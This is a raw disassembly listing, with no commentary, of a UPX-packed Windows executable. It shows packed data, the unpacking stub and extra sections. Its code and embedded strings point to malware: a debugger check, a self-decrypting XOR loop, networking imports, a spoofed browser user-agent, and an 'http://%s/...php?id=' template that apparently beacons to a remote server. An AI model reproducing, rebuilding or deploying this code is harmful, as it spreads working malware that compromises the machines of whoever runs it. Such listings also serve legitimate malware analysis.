dd 3D9A0497h, 0D56150E8h, 1425A00Bh, 0CD4B4D21h, 0D2415662h
dd 7D09E592h, 19419836h, 0C401F454h, 2E987A04h, 0AB8BE407h
dd 0B408B9F6h, 481FC523h, 436839C7h, 2565140Ch, 84102550h
dd 0E04DBFDDh, 0BF501D6Ah, 3C4C4F18h, 0C1D0514Fh, 743F81EAh
dd 0BB0A3D37h, 32BD758Ah, 53D942B3h, 60D8B3F4h, 53BC4906h
dd 0BDB3383Dh, 0EBB17EE6h, 32CE590Fh, 65B068B6h, 0E227A0C1h
dd 0D12A0E65h, 58C22638h, 0D9B9DA18h, 0BB4634B2h, 5E1C0DB9h
dd 0EB05066h, 57125E1Eh, 964EC6F0h, 0C6314CEEh, 0B6413BBBh
dd 2CFD90CCh, 90B650B6h, 480718B7h, 6015EB0Ch, 2D1880E5h
dd 0AF2509CDh, 5D32BA1Eh, 44330C69h, 0EC5B3D5Ch, 6A7E6883h
dd 0CC401113h, 84D0A99Bh, 311BFF00h, 661DF805h, 0F4109E46h
dd 0BE511FF0h, 0B048D56Fh, 1472048Dh, 2D0BE981h, 0FD8FEDF5h
dd 17018504h, 0C82BEC73h, 8B0CC48Bh, 0D8088BE1h, 0FF6ED6C8h
dd 435C5004h, 4055C64h, 58D8D800h, 0A3000049h, 420900A8h
dd 6C5D2FCh, 5224F102h, 80314153h, 0FFFFFFC8h, 0F50101DDh
dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh
dd 5E1A9544h, 0FFFFFFE8h, 85A03261h, 949F6A1Fh, 843994FFh
dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 377FFFFFh
dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h
dd 3B656C62h, 49534D20h, 0ED6FFFF7h, 15362045h, 6E695709h
dd 73776F64h, 20544E20h, 29312E35h, 2EECF734h, 0C7E445h
dd 0C40104D4h, 0F7DF0EB4h, 90A0CF3Ch, 68047480h, 0CF3D580Eh
dd 48097CF3h, 30D4743Ch, 9364DF3Ch, 10222045h, 0B600304Ah
dd 0F8F90DFFh, 76631340h, 75722E76h, 0D8DB777Eh, 700D6F6h
dd 976C6465h, 0C1660F65h, 0EDFFCA65h, 616573FDh, 0E686372h
dd 626F721Fh, 6863786Fh, 6F676E61h, 0D2E6EDFFh, 0C74651Fh
dd 622E6472h, 61007A69h, 6B686328h, 91B61762h, 740C6D61h
dd 24782D06h, 0E6EDB6CDh, 6F6C0600h, 6B37620Eh, 0FBDBF647h
dd 27626B6h, 76742E7Ah, 6F74111Bh, 176E2E70h, 30B60215h
dd 27730F69h, 3FC2E33h, 0F788DB6h, 6C756461h, 4B652D74h
dd 6DDB7269h, 3380CDFBh, 73A66E6Fh, 622E744Eh, 2B01F767h
dd 67694F7Ch, 77780032h, 0FECE2C61h, 626AED6Dh, 9B00AD62h
dd 6166617Ah, 221F2EA8h, 655DDBE1h, 61AF5C23h, 0F1646362h
dd 65FFDBB7h, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h
dd 0FF7A7978h, 54BFFFF2h, 44434241h, 48474645h, 4C4B4A49h
dd 504F4E4Dh, 56555451h, 5A595857h, 1B9BFBF8h, 49642563h
dd 6F530044h, 5C9E7466h, 706C694Dh, 0F90656BBh, 0DA575C0Dh
dd 0FE007374h, 4774E30Fh, 74684F31h, 2F3A7074h, 0C273252Fh
dd 0BC0EE6Fh, 2EC3912Fh, 3F706870h, 0EDF9ED3Ah, 260F3DDBh
dd 66E6373h, 6E692664h, 0F3B7666h, 3DF6EC76h, 13263032h
dd 0EB373D74h, 32313958h, 0BF87B237h, 3101D06Bh, 3030383Ah
dd 0DF07652Fh, 80FFFF00h, 5DDF1030h, 0B966C933h, 758D01EEh
dd 8AFE8B05h, 6FFFE206h, 7993CDBh, 302C0646h, 88993446h
dd 0EDE24707h, 0DAE80AEBh, 0B46FF7FEh, 676507DFh, 9993712Eh
dd 0FD1201C9h, 16FD91BDh, 0DFFFEFF7h, 6872C107h, 66FD42AAh
dd 0BA10FDAAh, 98A91C14h, 98F3C91Ah, 0FFB308F1h, 2865BB1h
dd 9010C071h, 9237CB5Fh, 781C9659h, 0F93ED3Ah, 57E414FBh
dd 3A0A7D71h, 9DF34571h, 9D2304F1h, 989BEFBh, 119C04F1h
dd 0EF67B340h, 0F3FD8EEDh, 1C10F0E3h, 59B20BDCh, 25C99B60h
dd 3D8F9601h, 414D9F6h, 71CA17A1h, 688D2B9Eh, 0EDAD9161h
dd 1A4637B3h, 111D960Ah, 0C850B228h, 6D9FED00h, 0DC14996Fh
dd 12255557h, 91C0A44Eh, 0FD994912h, 0EDDEDFECh, 140054F7h
dd 0CBCA3AC4h, 0FF1C3B71h, 6C21E424h, 1ADD87B3h, 8FCDCDCFh
dd 3F812C66h, 0FBB66F1Eh, 0B8B0FB9Fh, 12CDC383h, 0CBC9A85Dh
dd 7F64251Dh, 24AD9DB2h, 0A6485A0Bh, 0B314C096h, 1BC9FECBh
dd 0EBA7294Ch, 0E9BA9CF3h, 0D9FFF716h, 26F434F7h, 0EFCF571h
dd 0EF133BF9h, 376B4629h, 4766DE5Fh, 766FFFEFh, 16A0A8ECh
dd 0FFC5B701h, 0E9ECE9EDh, 0E1FCB7FDh, 0FBBFD2Ch, 0F5CA0161h
dd 0F25AFCFCh, 0FCF7EBFCh, 0FFABAAF5h, 0D6BFFFE5h, 0AAF934C7h
dd 2A25B459h, 0ACC9662Ah, 0B7819093h, 83639D90h, 9271CDC9h
dd 67F0BEECh, 3519BF30h, 95D91451h, 2A91720Ah, 0FFFBC871h
dd 0D2EB20FFh, 80D512A5h, 0AA529AE1h, 2A8D146Fh, 12B9C89Ah
dd 474A9A8Bh, 46FEDFFFh, 9BAB9EEBh, 20A319DBh, 0DDA26CECh
dd 9EED85BDh, 81E8A2DFh, 0FDBFFFCDh, 125544EBh, 961FBDC8h
dd 12EB8D2Eh, 5A9A85D8h, 9A099D12h, 0BBF8105Ah, 960B09FFh
dd 664922D0h, 12FEFD7Fh, 0C25AA987h, 6EDB4095h, 1285026Fh
dd 5A910482h, 9CFF7CBh, 0A767F9B9h, 4D53FF85h, 53187242h
dd 0F4BFFFC8h, 62FEFFCFh, 43500200h, 575445ABh, 204B524Fh
dd 474F5250h, 0ED624152h, 204DE35Bh, 4C17CD31h, 24D4E41h
dd 0EB52B70Ah, 3D66D390h, 676B03DFh, 4BB696EBh, 0E707587h
dd 27611A33h, 1F2A234Dh, 583274B6h, 32323221h, 5833312Eh
dd 18FE66D3h, 8B323C20h, 0C95A25A4h, 7A0773C8h, 0DBEC1B1Ah
dd 23FF0Ch, 140A1104h, 0DD40520h, 185DADEh, 4B4C0069h
dd 68505353h, 4BE48F6h, 8829772h, 240057E0h, 0EB605DCDh
dd 6F30006Eh, 3A73009Dh, 7B7B2274h, 90130B1h, 3500398Ch
dd 7301B223h, 72E1D5Bh, 0C9ABDA00h, 8273C80h, 0EC57DA20h
dd 9F324E24h, 461A0003h, 6407923h, 4007471Bh, 45060006h
dd 101B9FFFh, 8A151F01h, 48E088h, 444004Fh, 292FFFF6h
dd 0F27A6A19h, 281C49E4h, 742530AFh, 0E1536710h, 4DF214F2h
dd 3075DF5Ch, 0BAF70400h, 75CDAE6h, 5C085ABDh, 0D8DD4D61h
dd 72E5DC8h, 2E380036h, 491B3077h, 0B62E6CECh, 1043EC00h
dd 0E5633F00h, 6439E403h
dd 4DC08A2h, 0B7FC83D8h, 0FF1640h, 0E00DEDEh, 19F1600h
dd 26FD2602h, 2840484Ch, 6110319h, 8BF70D1Bh, 0D374D96Ch
dd 90A5C370h, 9C2AB2EFh, 6077256Bh, 109FB6CFh, 1B04480Eh
dd 0B73E1354h, 5A545D75h, 22596326h, 45CBC75Ch, 0E7FCD20Fh
dd 58765h, 4810030Bh, 0FFB810B8h, 0E7B17FFh, 286A050Bh
dd 0B10C3919h, 0A89B11D0h, 0D94FC000h, 0FF85F62Eh, 5D5FF5B1h
dd 1CEB8A88h, 0E89F11C9h, 48102B3Ch, 0B9F2D160h, 0F40C5EC8h
dd 0CA060A3h, 5790F200h, 0CB10CA0h, 0C8E4EFFBh, 880CA000h
dd 90040h, 0EC0703ECh, 0E49E11h, 4F401495h, 0BF40707Ch
dd 1B2297B2h, 13430700h, 23FF09E7h, 138578h, 0E9A65BABh
dd 63F81013h, 2F90273Ch, 230EFEFFh, 60C30740h, 8408E651h
dd 0F74F9388h, 10B94349h, 0B801FFEEh, 0E4D98710h, 0AD200CC9h
dd 7C7F070Dh, 0FC85796h, 700118D8h, 3E400F84h, 0F8495E4h
dd 36000F95h, 21BF279h, 6C0F847Fh, 0AB7B000Fh, 0A89A1E12h
dd 0FF13436Fh, 1F223024h, 50586E69h, 6C725020h, 2B029Bh
dd 39014446h, 0F2113F24h, 123C6B32h, 0EC027515h, 41F21035h
dd 941C0053h, 72BFFE01h, 0C606EB88h, 73255C5Ch, 6370695Ch
dd 0FFE5D424h, 0EC81666Fh, 0E4FF071Ch, 44655300h, 67756265h
dd 0E8DF7669h, 67ADD463h, 6A6441CFh, 6F548975h, 0DB92656Bh
dd 176EB266h, 126F4C73h, 0FD1C7075h, 61567F76h, 4165756Ch
dd 28704F17h, 2C77636Fh, 34C6A475h, 61766B00h, 0DF053367h
dd 75E318D4h, 39316DCDh, 0FE6A322Dh, 9F5A3A37h, 72545F6Ch
dd 6E577961h, 96DD4364h, 61AF36DAh, 6F94521Eh, 0AD685405h
dd 0CCEA354h, 7C45614h, 0BA99B65Ch, 532841B5h, 3EA37845h
dd 0FA34356Eh, 0F54BB3D2h, 544822F3h, 7D835054h, 404B46A9h
dd 4F6C9C20h, 0BB0A0D4Bh, 1EF52B5h, 244CB4Bh, 0CA044C2Dh
dd 676ADF66h, 25203A59h, 0DA2F1875h, 28587B5Ah, 26B97954h
dd 6D5A70A7h, 63B2B6A6h, 2E2F15AFh, 8EA9EE56h, 72BF2DCBh
dd 59B4CBCDh, 4757B18Bh, 1E3FC304h, 372A942Dh, 0F1640200h
dd 0E95FED0Bh, 6D9573D7h, 0B1637673h, 2DDF77D7h, 25692D5Eh
dd 175F320Fh, 98B73475h, 7BD2F6Bh, 38393103h, 0D34D34DBh
dd 34353637h, 75236933h, 7DCE9A6h, 2F313203h, 0DEF60C39h
dd 3837D9h, 37073B43h, 8320C832h, 0C8343536h, 330C8320h
dd 93523132h, 0FB8B2CD4h, 0B7F9E03Ah, 0C7EDB58Ah, 54464F47h
dd 45524157h, 9163F0Dh, 75435CD7h, 56297272h, 6C378442h
dd 5C1E73E8h, 0B36E7552h, 0D0B6ED37h, 0EA6F74E2h, 20306838h
dd 7FF81B53h, 0FB0F1A14h, 736E6753h, 796A7264h, 0CB564472h
dd 7E741768h, 0B9AAEAA7h, 5F7A43C2h, 0CE23h, 4C10E147h
dd 47136055h, 535E01BBh, 9E432053h, 0D5762067h, 0ADBD9B53h
dd 945876DCh, 7C23B532h, 2D82F642h, 0E3471A1Bh, 23CB7337h
dd 79931217h, 0A35A8473h, 4200F1B1h, 75D72077h, 0BDADB023h
dd 6D1B13C5h, 0DD975220h, 0A5B73772h, 2044180Dh, 2F662620h
dd 2D856D67h, 2AAC73D9h, 22632463h, 0FED722D9h, 20797469h
dd 1E6E614Dh, 1831F81Ah, 420000Ch, 15455D12h, 0FB2493C4h
dd 0C0017119h, 65657246h, 0B7E00D0Ch, 470DCD47h, 6F4D7465h
dd 2F14BF87h, 434665C5h, 406D614Eh, 74736C01h, 35DEF772h
dd 0A956380h, 79706F43h, 0E1480A19h, 456102DEh, 22326578h
dd 0F8A5FFEDh, 6C6F6F54h, 3233703Bh, 70616E53h, 746F6873h
dd 9B5BBA19h, 32127414h, 540F7372h, 235AE60Bh, 182C35A3h
dd 0F60B6C21h, 78654E01h, 41616974h, 16BFFB54h, 0CF76453Ch
dd 7469616Bh, 53726F46h, 0ED74423Ch, 4F7B676Dh, 2C766A62h
dd 0E025A144h, 8D22B59Bh, 0CD964CB7h, 45DB76CDh, 2F725072h
dd 48196972h, 0EF64BDD6h, 486573FDh, 0C646E61h, 886C3255h
dd 8B61B59h, 4618E06Eh, 46D735F1h, 64B14465h, 59498B4Bh
dd 530C1BC0h, 64656B1Dh, 0ADDD1F45h, 1270B36Dh, 661D4061h
dd 1153246Fh, 96EC9B3h, 6EC17065h, 25CFF64Bh, 12EE9E9Bh
dd 6464410Bh, 0EF660F72h, 4CD9221Bh, 61726269h, 0CD15B567h
dd 4D2BC1B5h, 6C137C82h, 0BB961016h, 8763CF9Ch, 54F685B5h
dd 75969869h, 2B4DDE65h, 0B15B092h, 0B4B44278h, 0D366C37h
dd 0E539AF5Dh, 5D22CC21h, 78456862h, 66C25B6Dh, 630AF631h
dd 373C6D13h, 522D8DC1h, 87B591Bh, 2ECD82ADh, 38657A94h
dd 9F9D5B5Ch, 2CD1937Dh, 654B9367h, 0EC3B4579h, 7810CE40h
dd 0A510F99h, 5AC25EC0h, 309011E8h, 426C5987h, 0D21021E7h
dd 7B70A107h, 62410C51h, 6853B024h, 688D0E29h, 0FF78F1F6h
dd 0D9851AC1h, 10892877h, 7DB662BBh, 6112440Ah, 6669320Eh
dd 0B63AD61Bh, 8F67BC79h, 6C362B75h, 436F616Fh, 2C796FC0h
dd 23506F11h, 52106770h, 3F900E8Fh, 0B4A438F6h, 71634114h
dd 70726975h, 4DD874AEh, 3AA03549h, 59A7C336h, 73ECDE13h
dd 6D06BC72h, 0D1CE18B1h, 840E27B2h, 99DA150Fh, 1D4D536Bh
dd 0C54A445Fh, 3FB8740Ah, 0C5E8685Fh, 6EC46D27h, 0AD0702CDh
dd 880D696Fh, 660AD172h, 14E955B3h, 40288901h, 0F3488CD3h
dd 0CC652D15h, 0EC0CC362h, 0E10A1415h, 0DF26106Eh, 776C49ACh
dd 0C20B7073h, 0B75BB669h, 0F44F4166h, 3DB6FC28h, 8B2C2834h
dd 1141A155h, 16C05212h, 6A615F0Eh, 6B14C370h, 0C9416E09h
dd 3BB86658h, 1A877453h, 0F5135B3Fh, 7940EB45h, 2C020273h
dd 0D2CB2CBh, 346F3901h, 0B2CB2CB2h, 4090C17h, 2AA4F413h
dd 141610CBh, 7C834550h, 74EC4AABh, 40E07ED2h, 0CE8011E0h
dd 10F00FDh, 0BE06010Bh, 6ABA120Ch, 0EFCB20ECh, 31431024h
dd 0BA4B020Bh, 7283259h, 364600Ch, 341E733Bh, 8060710h
dd 37B39609h, 0E33F8C2Fh, 6405DB0Ah, 2E1E0180h, 0B06C0C5Bh
dd 263207DDh, 0DBC42890h, 7D0483E3h, 642EE004h, 6E54FBE7h
dd 1221DD21h, 162C27h, 0C08574BEh, 0C9314648h, 54h, 0
align 10h
pusha
mov esi, offset dword_31436000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31437CA2
; ---------------------------------------------------------------------------
align 8
loc_31437C98: ; CODE XREF: UPX1:loc_31437CA9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31437C9E: ; CODE XREF: UPX1:31437D36�j
; UPX1:31437D4D�j
add ebx, ebx
jnz short loc_31437CA9
loc_31437CA2: ; CODE XREF: UPX1:31437C90�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437CA9: ; CODE XREF: UPX1:31437CA0�j
jb short loc_31437C98
mov eax, 1
loc_31437CB0: ; CODE XREF: UPX1:31437CBF�j
; UPX1:31437CCA�j
add ebx, ebx
jnz short loc_31437CBB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437CBB: ; CODE XREF: UPX1:31437CB2�j
adc eax, eax
add ebx, ebx
jnb short loc_31437CB0
jnz short loc_31437CCC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31437CB0
loc_31437CCC: ; CODE XREF: UPX1:31437CC1�j
xor ecx, ecx
sub eax, 3
jb short loc_31437CE0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31437D52
mov ebp, eax
loc_31437CE0: ; CODE XREF: UPX1:31437CD1�j
add ebx, ebx
jnz short loc_31437CEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437CEB: ; CODE XREF: UPX1:31437CE2�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31437CF8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437CF8: ; CODE XREF: UPX1:31437CEF�j
adc ecx, ecx
jnz short loc_31437D1C
inc ecx
loc_31437CFD: ; CODE XREF: UPX1:31437D0C�j
; UPX1:31437D17�j
add ebx, ebx
jnz short loc_31437D08
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31437D08: ; CODE XREF: UPX1:31437CFF�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31437CFD
jnz short loc_31437D19
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31437CFD
loc_31437D19: ; CODE XREF: UPX1:31437D0E�j
add ecx, 2
loc_31437D1C: ; CODE XREF: UPX1:31437CFA�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31437D3C
loc_31437D2D: ; CODE XREF: UPX1:31437D34�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31437D2D
jmp loc_31437C9E
; ---------------------------------------------------------------------------
align 4
loc_31437D3C: ; CODE XREF: UPX1:31437D2B�j
; UPX1:31437D49�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31437D3C
add edi, ecx
jmp loc_31437C9E
; ---------------------------------------------------------------------------
loc_31437D52: ; CODE XREF: UPX1:31437CDC�j
pop esi
mov edi, esi
mov ecx, 86h
loc_31437D5A: ; CODE XREF: UPX1:31437D61�j
; UPX1:31437D66�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31437D5F: ; CODE XREF: UPX1:31437D84�j
cmp al, 1
ja short loc_31437D5A
cmp byte ptr [edi], 1
jnz short loc_31437D5A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31437D5F
lea edi, [esi+5000h]
loc_31437D8C: ; CODE XREF: UPX1:31437DAE�j
mov eax, [edi]
or eax, eax
jz short loc_31437DD7
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31437DA9: ; CODE XREF: UPX1:31437DCF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31437D8C
mov ecx, edi
jns short near ptr loc_31437DBA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31437DBA: ; CODE XREF: UPX1:31437DB2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31437DD1
mov [ebx], eax
add ebx, 4
jmp short loc_31437DA9
; ---------------------------------------------------------------------------
loc_31437DD1: ; CODE XREF: UPX1:31437DC8�j
call dword ptr [esi+7094h]
loc_31437DD7: ; CODE XREF: UPX1:31437D90�j
popa
jmp loc_314324EF
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31438000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
xchg eax, ebx
push 0ED01C390h
mov eax, esp
call eax
pop ebx
call loc_3143826F
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:31438219�j
jmp short near ptr loc_31438214+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_3143826E
call $+5
pop ebp
sub ebp, 402338h
mov eax, [ebp+402385h]
add eax, [ebp+40238Dh]
mov esi, eax
mov eax, [ebp+402389h]
add eax, [ebp+40238Dh]
push eax
pusha
mov edi, esi
xor ecx, ecx
mov dl, [ebp+402395h]
loc_3143825E: ; CODE XREF: UPX2:3143826B�j
lodsb
xor al, dl
add dl, al
stosb
inc ecx
cmp ecx, [ebp+402391h]
jl short loc_3143825E
popa
locret_3143826E: ; CODE XREF: UPX2:3143822A�j
retn
; ---------------------------------------------------------------------------
loc_3143826F: ; CODE XREF: UPX2:3143820B�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], ah
add [eax+7Ch], al
add [ebx+31h], al
add [esi], bl
; ---------------------------------------------------------------------------
dd 300000h, 75Ch dup(0)
UPX2 ends
; Section 4. (virtual address 0000A000)
; Virtual size : 00000001 ( 1.)
; Section size in file : 00000001 ( 1.)
; Offset to raw data for section: 0000A000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_tqn_ segment para public 'CODE' use32
assume cs:_tqn_
;org 3143A000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
db 0
db 3 dup(?)
dd 7Fh dup(?)
_tqn_ ends
; Section 5. (virtual address 0000B000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000A200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3143B000h
align 2000h
_idata2 ends
end start